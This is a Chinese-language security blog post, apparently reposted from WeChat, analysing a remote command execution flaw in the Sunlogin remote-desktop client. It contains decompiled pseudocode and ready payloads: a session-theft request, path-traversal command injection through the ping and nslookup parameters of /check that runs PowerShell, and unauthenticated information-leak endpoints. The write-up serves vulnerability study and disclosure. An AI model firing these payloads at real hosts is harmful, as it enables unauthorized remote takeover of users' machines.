0x00 前言
测试程序版本为 11.0.0.32806 从蛛丝马迹中追根溯源.
Payload:
/cgi-bin/rpc?action=verify-haras '//获取Session 进行未授权操作'
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami '//利用Ping拼接命令进行攻击(只适用于有Powershell的机器[win2012 win10 win2016等])'
0x01 upx 脱壳
向日葵为C++编写,使用UPX3.X加壳故此分析前需要进行脱壳处理(github上有UPX项目,可以直接脱)
工具:upx.github.io [用法 upx -d SunloginClient.exe]
向日葵在启动的时候还会随机启动一个4W+高位端口(大部分为 49152 到 65535),
0x02 IDA 逆向分析
把脱壳后的向日葵拖进IDA分析(注意是要安装版的向日葵,不是绿色版的,绿色版无效.)
按下Shift+F12 搜索关键词:CID
发现三个关键函数: sub_1410D3E30 sub_1410D43C8 sub_1410D46A8
往下找到关键接口:login.cgi Ctrl+X 后按F5弄出伪代码 追踪. 发现一大堆接口.
"
login
express_login
cgi-bin/login.cgi
log
cgi-bin/rpc
transfer
cloudconfig
getfastcode
assist
cloudconfig
projection
getaddress
sunlogin-tools
desktop.list
check
micro-live/enable
control.cgi
/cgi-bin/rpc
我们先看一下 /cgi-bin/rpc 这个接口 简单追踪一下 在v58这里找到功能性参数. Sub_140E1D284
功能点一
if ( !(unsigned int)sub_140101DB0(v131, "login-type") )
{
sub_1405AC7D0(v93);
v16 = "0";
if ( (*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 + 416) + 288i64) + 112i64))(*(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64)) )
v16 = "1";
v105 = 0i64;
v106 = 0i64;
sub_1400EEDC0(v104, 0i64, 0i64);
if ( *v16 )
{
v17 = -1i64;
do
++v17;
while ( v16[v17] );
}
else
{
v17 = 0i64;
}
sub_1400F0690(v104, v16, v17);
v18 = "0";
if ( (*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 + 416) + 288i64) + 120i64))(*(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64)) )
v18 = "1";
v127 = 0i64;
v128 = 0i64;
sub_1400EEDC0(v126, 0i64, 0i64);
if ( *v18 )
{
v19 = -1i64;
do
++v19;
while ( v18[v19] );
}
else
{
v19 = 0i64;
}
sub_1400F0690(v126, v18, v19);
v111 = 0i64;
v112 = 0i64;
sub_1400EEDC0(v110, 0i64, 0i64);
sub_1400F0690(v110, (void *)"0", 1ui64);
v20 = sub_1401B1780(*(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64), v154) + 608;
v114 = 0i64;
v115 = 0i64;
sub_1400EEDC0(v113, 0i64, 0i64);
sub_1400F0F50(v113, v20);
sub_1401B20B0(v154);
v21 = sub_1401B1780(*(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64), v155) + 32;
v123 = 0i64;
v124 = 0i64;
sub_1400EEDC0(v122, 0i64, 0i64);
sub_1400F0F50(v122, v21);
sub_1401B20B0(v155);
v117 = 0i64;
v118 = 0i64;
sub_1400EEDC0(v116, 0i64, 0i64);
sub_1400F07C0(v116);
v102 = 0i64;
v103 = 0i64;
sub_1400EEDC0(v101, 0i64, 0i64);
sub_1400F0690(v101, (void *)"0", 1ui64);
sub_1400F0690(v101, "1", 1ui64);
memset(Buffer, 0, sizeof(Buffer));
sub_140150A60(
Buffer,
"{"__code":0,"use_custom":%d,"code":0,"version":"%s","isbinding":%s,"isinstalled":%s,"isprojection""
":%s,"platform":"%s","mac":"%s","request_need_pwd":"%s","accept_request":"1","support_file":"1""
","disable_remote_bind":"%s"} ");
if ( Buffer[0] )
{
do
++v6;
while ( Buffer[v6] );
v4 = v6;
}
sub_1400F0690(Src, Buffer, v4);
v72 = 1;
CxxThrowException(&v72, (_ThrowInfo *)&_TI1_N);
}
Payload:/cgi-bin/rpc?action=login-type 未授权查看向日葵版本,操作系统os,MAC地址等.
功能点二
Payload:/cgi-bin/rpc?action=verify-haras 获取到Session 以进行下一步未授权操作.
/check
这里我们再看一下check功能点 关键函数在 sub_140E1C0B8:
发现其定义了两个参数,很明显ping 和 nslookup 肯定有操作空间.
功能点一
Payload:/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami
利用ping调用Powershell执行命令.
功能点二
Payload:/check?cmd=nslookup../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami
利用nslookup调用Powershell执行命令.
/getfastcode
获取识别码 需要Sessions才能获取到识别码(没什么用处)
Payload:/getfastcode(Cookie:CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3)
/getaddress
未授权获取Oray向日葵映射的远程地址. 这个地址就是映射在外网的地址.很不Safe!
Payload:/getaddress
0x03 总结
参考文章:
📎向日葵远程命令执行漏洞分析.pdf
https://www.cnblogs.com/zUotTe0/p/15913108.html
https://422926799.github.io/posts/c5ac22a4.html
https://github.com/ce-automne/SunloginRCE
https://github.com/wafinfo/Sunflower_get_Password
|
回顾: |
原文始发于微信公众号(星悦安全):向日葵远程命令执行逆向浅析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论